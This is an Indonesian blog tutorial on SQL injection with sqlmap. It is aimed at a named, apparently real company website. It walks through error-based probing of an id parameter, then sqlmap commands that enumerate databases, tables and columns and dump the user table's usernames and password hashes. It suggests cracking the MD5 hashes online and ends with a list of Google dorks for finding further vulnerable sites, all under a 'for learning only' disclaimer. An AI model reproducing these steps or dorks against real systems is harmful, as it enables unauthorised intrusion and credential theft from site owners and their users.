SQL Injection with SQLMAP~Yo bertemu lagi dengan saya, pada kesempatan kali ini saya akan memberikan tutorial bagaimana cara melakukan sql injection pada sebuah website menggunakan tool yang mungkin sudah familiar ya ?? lha terus dari mana saya mendapatkan target nya ?? saya melakukan dorking tenang nanti saya kasih dork nya oke kita mulai saja biar gak kelamaan
1. Pertama buka web browser kalian, pada address bar isikan URL target kalian di sini target saya adalah http://www.sentulcity.co.id/product-det2.php?id=4 oke selanjutnya kita tambhakan karakter ' pada bagian php?id=4' jadi nya gini http://www.sentulcity.co.id/product-det2.php?id=4' untuk melihat apakah ada pesan error selanjutnya tekan enter.
nah kalo error seperti di bawah ini, berarti tandanya website ini vuln
sebenernya untuk error nya setiap kasus beda-beda ya
2. Oke lanjut langkah kedua buka terminal kalian terus ketikkan perintah untuk melihat database yang ada pada website tersebut dengan menggunakan perintah
sqlmap -u (target kalian ) --dbs
sqlmap -u http://www.sentulcity.co.id/product-det2.php?id=4 --dbs
oke dari perintah di atas kita mendapatkan dua database disana, mohon maaf saya sensor
3. Nah udah dapat database nya tinggal kita lihat ada berapa table pada database tersebut menggunakan perintah
sqlmap -u (target kalian) -D (pilih database nya) --tables
sqlmap -u http://www.sentulcity.co.id/product-det2.php?id=4 -D (sensor :v) -- tables
oke dari perintah tadi kita mendapatkan 45 table di website tersebut, nah di sini kalian cari kira-kira table mana yang berisi username dan password di sana ada tbl_user kemungkinan username dan password ada di tabel itu.
4. Selanjutnya kita lihat column pada tabel yang sudah ditentukan menggunakan perintah
sqlmap -u (target kalian ) -D (sensor :v) -T tbl_user --column
sqlmap -u http://www.sentulcity.co.id/product-det2.php?id=4 -D (sen sor :v) -T tbl_user --column
Benar saja di sana ada column user_name dan user_pass nah kita dump column itu untuk mendapatkan username dan password.
5. Kita dump column user_name dan user_pass untuk mendapatkan password menggunakan perintah
sqlmap -u (target kalian) -D (sensor :v) -T tbl_user -C user_name,user_pass --dump
sqlmap -u http://www.sentulcity.co.id/product-det2.php?id=4 -D (sensor :v) -T tbl_user - C user_name,user_pass --dump
Oke setelah kita dump kita mendapatkan username dan password, kalian bisa lihat disana passwordnya di hash kemungkinan pake hash md5, kalian bisa decrypt md5 nya menggunakan md5 decrypter online hashkiller disini oke di bawah ini adalah dork yang saya janjikan tadi
intext:"GetArray()" +site:mm
intext:"FetchRow()" +site:mm
product.php?testimonial_id=
product.php?testimonial_cat=
product.php?testimonial_proid=
product.php?testimonial_cid=
product.php?testimonial_pid=
product.php?testimonial_id=
inurl:"merchandise/index.php?cat="
inurl:".php?index="
inurl:".php?CID="
inurl:".php?SID="
inurl:".php?term="
inurl:".php?sellerID="
inurl:".php?func="
inurl:".php?idz="
inurl:".php?opt="
inurl:".php?txtMainNavID="
inurl:".php?main="
inurl:".php?mood&cat="
inurl:".php?ResultGridPage="
inurl:".php?machineid="
inurl:".php?p1="
inurl:".php?uid="
sekalian deh live target nya
Oke sampai sini dulu ya tutorial kali ini, sebelumnya ini hanya untuk pembelajaran ya ?? jadi
jika nanti ada apa-apa saya gak bertanggung jawab, karena saya hanya memberikan tutorial
jika nanti ada apa-apa saya gak bertanggung jawab, karena saya hanya memberikan tutorial
saja oke sampai jumpa di tutorial berikutnya [sinkayupi48] 😀😁
kalo bingung kalian bisa lihat video nya di bawah ini
Tidak ada komentar:
Posting Komentar